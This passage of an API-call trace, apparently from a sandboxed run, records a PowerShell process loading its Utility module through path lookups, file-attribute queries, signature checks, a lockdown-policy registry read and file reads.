(in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0114.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0114.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0dc20) returned 1 [0114.544] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5a0dee4 | out: lpFileInformation=0x5a0dee4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2d1d80, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e2d1d80, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982)) returned 1 [0114.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0dc1c) returned 1 [0114.544] CoTaskMemAlloc (cb=0x10) returned 0x6c12f8 [0114.544] CoTaskMemAlloc (cb=0x10) returned 0x6c1328 [0114.544] CoTaskMemAlloc (cb=0xe4) returned 0x696ff8 [0114.544] CoTaskMemAlloc (cb=0x30) returned 0x6bc1a8 [0114.544] WinVerifyTrust () returned 0x800b0100 [0114.561] CoTaskMemFree (pv=0x6c12f8) [0114.561] CoTaskMemFree (pv=0x6bc1a8) [0114.561] CryptCATHandleFromStore () returned 0x65b2f8 [0114.561] WTHelperGetProvSignerFromChain () returned 0x0 [0114.562] CoTaskMemAlloc (cb=0x10) returned 0x6c12f8 [0114.562] CoTaskMemAlloc (cb=0x30) returned 0x6bc1a8 [0114.562] WinVerifyTrust () returned 0x0 [0114.562] CoTaskMemFree (pv=0x6bc1a8) [0114.562] CoTaskMemFree (pv=0x6c12f8) [0114.562] CoTaskMemFree (pv=0x696ff8) [0114.562] CoTaskMemFree (pv=0x6c1328) [0114.570] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en-US\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en-us\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0114.571] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0114.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0114.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0114.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0114.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0114.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x64 [0114.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", nBufferLength=0x64, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml", lpFilePart=0x0) returned 0x63 [0114.587] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d6dc) returned 1 [0114.587] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\PSGetModuleInfo.xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\psgetmoduleinfo.xml"), fInfoLevelId=0x0, lpFileInformation=0x5a0d9a0 | out: lpFileInformation=0x5a0d9a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0114.588] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d6d8) returned 1 [0114.588] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0114.589] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Commands.Utility.dll\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.commands.utility.dll\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0114.589] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x5a0d650, nSize=0xc9 | out: lpBuffer="") returned 0xc5 [0114.592] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules")) returned 0x10 [0114.594] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0114.594] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x51, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x50 [0114.594] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0114.594] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0114.594] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0114.604] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0114.608] GetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\keecfmwgj\\documents\\windowspowershell\\modules")) returned 0xffffffff [0114.618] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules" (normalized: "c:\\program files (x86)\\windowspowershell\\modules")) returned 0x10 [0114.620] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x57 [0114.620] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x57, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x56 [0114.620] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0114.620] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0114.620] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0114.625] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\program files (x86)\\windowspowershell\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0114.629] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules")) returned 0x10 [0114.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x59 [0114.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", nBufferLength=0x59, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility", lpFilePart=0x0) returned 0x58 [0114.630] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4e4) returned 1 [0114.630] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility"), fInfoLevelId=0x0, lpFileInformation=0x5a0d7a8 | out: lpFileInformation=0x5a0d7a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0114.631] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4e0) returned 1 [0114.635] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Commands.Utility\\Microsoft.PowerShell.Commands.Utility.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.commands.utility\\microsoft.powershell.commands.utility.dll")) returned 0xffffffff [0115.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9a [0115.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x9a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0115.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9a [0115.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x9a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0115.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x9a [0115.014] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x9a, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\v4.0_3.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x99 [0115.565] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1")) returned 0x20 [0115.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0115.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0115.565] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x5a0d508, Length=0x20, ResultLength=0x5a0d578 | out: SystemInformation=0x5a0d508, ResultLength=0x5a0d578*=0x0) returned 0xc0000003 [0115.565] GetSystemInfo (in: lpSystemInfo=0x5a0d584 | out: lpSystemInfo=0x5a0d584*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0115.566] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x5a0d514 | out: phkResult=0x5a0d514*=0x418) returned 0x0 [0115.566] RegQueryValueExW (in: hKey=0x418, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x5a0d530, lpData=0x0, lpcbData=0x5a0d52c*=0x0 | out: lpType=0x5a0d530*=0x0, lpData=0x0, lpcbData=0x5a0d52c*=0x0) returned 0x2 [0115.566] RegCloseKey (hKey=0x418) returned 0x0 [0115.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0115.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0115.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d2b8) returned 1 [0115.567] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x27e4fd8 | out: lpFileInformation=0x27e4fd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e285ac0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e285ac0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778)) returned 1 [0115.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d2b4) returned 1 [0115.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0115.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0115.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d278) returned 1 [0115.568] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x5a0d53c | out: lpFileInformation=0x5a0d53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e285ac0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e285ac0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778)) returned 1 [0115.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d274) returned 1 [0115.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0115.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0115.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0115.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0115.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d20c) returned 1 [0115.568] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x5a0d4d0 | out: lpFileInformation=0x5a0d4d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e285ac0, ftCreationTime.dwHighDateTime=0x1d706a9, ftLastAccessTime.dwLowDateTime=0x8e285ac0, ftLastAccessTime.dwHighDateTime=0x1d706a9, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778)) returned 1 [0115.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d208) returned 1 [0115.568] CoTaskMemAlloc (cb=0x10) returned 0x5bc79c0 [0115.569] CoTaskMemAlloc (cb=0x10) returned 0x5bc7990 [0115.569] CoTaskMemAlloc (cb=0xe4) returned 0x696ff8 [0115.569] CoTaskMemAlloc (cb=0x30) returned 0x5bc3fe0 [0115.569] WinVerifyTrust () returned 0x800b0100 [0115.585] CoTaskMemFree (pv=0x5bc79c0) [0115.585] CoTaskMemFree (pv=0x5bc3fe0) [0115.585] CryptCATHandleFromStore () returned 0x65b418 [0115.585] WTHelperGetProvSignerFromChain () returned 0x0 [0115.585] CoTaskMemAlloc (cb=0x10) returned 0x5bc79c0 [0115.585] CoTaskMemAlloc (cb=0x30) returned 0x5bc3fe0 [0115.585] WinVerifyTrust () returned 0x0 [0115.586] CoTaskMemFree (pv=0x5bc3fe0) [0115.586] CoTaskMemFree (pv=0x5bc79c0) [0115.586] CoTaskMemFree (pv=0x696ff8) [0115.586] CoTaskMemFree (pv=0x5bc7990) [0115.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0115.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x5bc3b18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0115.586] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5a0d4c4) returned 1 [0115.586] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x418 [0115.587] GetFileType (hFile=0x418) returned 0x1 [0115.587] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5a0d4c0) returned 1 [0115.587] GetFileType (hFile=0x418) returned 0x1 [0115.587] SetFilePointer (in: hFile=0x418, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d500*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d500*=0) returned 0x0 [0115.587] ReadFile (in: hFile=0x418, lpBuffer=0x27e67ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d52c, lpOverlapped=0x0 | out: lpBuffer=0x27e67ec*, lpNumberOfBytesRead=0x5a0d52c*=0x1000, lpOverlapped=0x0) returned 1 [0115.588] SetFilePointer (in: hFile=0x418, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d500*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d500*=0) returned 0x1000 [0115.588] ReadFile (in: hFile=0x418, lpBuffer=0x27e67ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d52c, lpOverlapped=0x0 | out: lpBuffer=0x27e67ec*, lpNumberOfBytesRead=0x5a0d52c*=0x1000, lpOverlapped=0x0) returned 1 [0115.588] SetFilePointer (in: hFile=0x418, lDistanceToMove=0, lpDistanceToMoveHigh=0x5a0d500*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x5a0d500*=0) returned 0x2000 [0115.588] ReadFile (in: hFile=0x418, lpBuffer=0x27e67ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5a0d52c, lpOverlapped=0x0 | out: lpBuffer=0x27e67ec*, lpNumberOfBytesRead=0x5a0d52c*=0x1000, lpOverlapped=0x0) returned 1 [0115.589] SetFilePointer (in: hFile=0x418, 